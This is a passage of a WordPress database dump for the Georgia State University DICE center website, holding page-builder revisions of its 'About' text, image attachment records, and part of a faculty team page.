class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-05-03 13:33:38','2022-05-03 17:33:38','',22,'https://gsudice.dataconn.net/?p=1320',0,'revision','',0),(1324,1,'2022-05-03 13:35:46','2022-05-03 17:35:46','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-05-03 13:35:46','2022-05-03 17:35:46','',353,'https://gsudice.dataconn.net/?p=1324',0,'revision','',0),(1325,1,'2022-05-03 13:35:46','2022-05-03 17:35:46','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-05-03 13:35:46','2022-05-03 17:35:46','',122,'https://gsudice.dataconn.net/?p=1325',0,'revision','',0),(1335,1,'2022-06-10 09:02:18','2022-06-10 13:02:18','','IMG_1240','','inherit','open','closed','','img_1240','','','2022-06-10 09:02:18','2022-06-10 13:02:18','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/IMG_1240.jpg',0,'attachment','image/jpeg',0),(1336,1,'2022-06-10 09:02:36','2022-06-10 13:02:36','https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg','IMG_1240','','inherit','open','closed','','img_1240-2','','','2023-10-13 10:03:22','2023-10-13 14:03:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg',0,'attachment','image/jpeg',0),(1348,1,'2022-08-31 10:18:29','2022-08-31 14:18:29','','hu_new','','inherit','open','closed','','hu_new-2','','','2022-08-31 10:18:29','2022-08-31 14:18:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg',0,'attachment','image/jpeg',0),(1357,1,'2022-10-24 12:26:39','2022-10-24 16:26:39','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby-1.jpg','cropped-Ruby-1.jpg','','inherit','open','closed','','cropped-ruby-1-jpg','','','2022-10-24 12:26:39','2022-10-24 16:26:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby-1.jpg',0,'attachment','image/jpeg',0),(1358,1,'2022-10-24 12:26:58','2022-10-24 16:26:58','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-jpg','','','2022-10-24 12:26:58','2022-10-24 16:26:58','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg',0,'attachment','image/jpeg',0),(1359,1,'2022-10-24 12:28:39','2022-10-24 16:28:39','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1-1.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-1-jpg','','','2022-10-24 12:28:39','2022-10-24 16:28:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg',0,'attachment','image/jpeg',0),(1369,1,'2022-11-03 22:57:40','2022-11-04 02:57:40','','bayo','','inherit','open','closed','','bayo','','','2023-09-26 22:19:52','2023-09-27 02:19:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo.jpeg',0,'attachment','image/jpeg',0),(1388,1,'2023-09-26 21:06:27','2023-09-27 01:06:27','<div class=\"style-407 style-local-182-c1 position-relative\" data-colibri-id=\"182-c1\">\n<div id=\"team\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-510 style-local-182-c2 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c2\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-522 style-local-182-c67 position-relative\" data-colibri-id=\"182-c67\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-523-outer style-local-182-c68-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-523 style-local-182-c68 position-relative\" data-colibri-id=\"182-c68\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-524 style-local-182-c69 position-relative h-element\" data-colibri-id=\"182-c69\">\n<div class=\"h-heading__outer style-524 style-local-182-c69\">\n<h2 class=\"\">Faculty</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-511 style-local-182-c3 position-relative\" data-colibri-id=\"182-c3\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c4-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c4 position-relative\" data-colibri-id=\"182-c4\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c5 position-relative h-element\" data-colibri-id=\"182-c5\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-706 style-513-image style-local-182-c5-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c5-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c6 position-relative\" data-colibri-id=\"182-c6\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c7-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c7 position-relative\" data-colibri-id=\"182-c7\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c8 position-relative h-element\" data-colibri-id=\"182-c8\">\n<div class=\"h-heading__outer style-516 style-local-182-c8\">\n<h4 class=\"\">Chetan Tiwari</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c9 position-relative h-element\" data-colibri-id=\"182-c9\">\n<div class=\"\">\n\nDirector\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c10 position-relative h-element\" data-colibri-id=\"182-c10\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c11-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c11 position-relative\" data-colibri-id=\"182-c11\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c12 position-relative h-element\" data-colibri-id=\"182-c12\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-708 style-513-image style-local-182-c12-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c12-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c13 position-relative\" data-colibri-id=\"182-c13\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c14-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c14 position-relative\" data-colibri-id=\"182-c14\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c15 position-relative h-element\" data-colibri-id=\"182-c15\">\n<div class=\"h-heading__outer style-516 style-local-182-c15\">\n<h4 class=\"\">Armin Mikler</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c16 position-relative h-element\" data-colibri-id=\"182-c16\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-520 style-local-182-c17 position-relative h-element\" data-colibri-id=\"182-c17\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c18-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c18 position-relative\" data-colibri-id=\"182-c18\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c19 position-relative h-element\" data-colibri-id=\"182-c19\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-710 style-513-image style-local-182-c19-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-sunderraman1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c19-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c20 position-relative\" data-colibri-id=\"182-c20\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c21-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c21 position-relative\" data-colibri-id=\"182-c21\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c22 position-relative h-element\" data-colibri-id=\"182-c22\">\n<div class=\"h-heading__outer style-516 style-local-182-c22\">\n<h4 class=\"\">Raj Sunderraman</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c23 position-relative h-element\" data-colibri-id=\"182-c23\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c24 position-relative h-element\" data-colibri-id=\"182-c24\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c25-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c25 position-relative\" data-colibri-id=\"182-c25\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c26 position-relative h-element\" data-colibri-id=\"182-c26\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-707 style-513-image style-local-182-c26-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1.png\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c26-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c27 position-relative\" data-colibri-id=\"182-c27\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c28-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c28 position-relative\" data-colibri-id=\"182-c28\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c29 position-relative h-element\" data-colibri-id=\"182-c29\">\n<div class=\"h-heading__outer style-516 style-local-182-c29\">\n<h4 class=\"\">Susie Ramisetty-Mikler</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c30 position-relative h-element\" data-colibri-id=\"182-c30\">\n<div class=\"\">\n\nResearch Associate Professor\n\n</div>\n</div>\n<div class=\"style-519 style-local-182-c31 position-relative h-element\" data-colibri-id=\"182-c31\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c32-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c32 position-relative\" data-colibri-id=\"182-c32\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c33 position-relative h-element\" data-colibri-id=\"182-c33\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-709 style-513-image style-local-182-c33-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-bourgeois-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c33-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c34 position-relative\" data-colibri-id=\"182-c34\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c35-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c35 position-relative\" data-colibri-id=\"182-c35\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c36 position-relative h-element\" 